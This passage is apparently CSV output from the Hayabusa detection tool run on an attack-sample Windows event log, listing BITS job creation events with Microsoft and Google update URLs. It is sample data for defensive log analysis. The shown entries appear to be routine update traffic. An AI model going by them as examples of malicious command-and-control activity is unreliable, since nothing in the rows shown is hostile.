Control/bits_openvpn.evtx -2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-11 21:51:23.040 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe : URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe : URL: http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:25.377 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-22 00:54:59.449 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 19:46:04.676 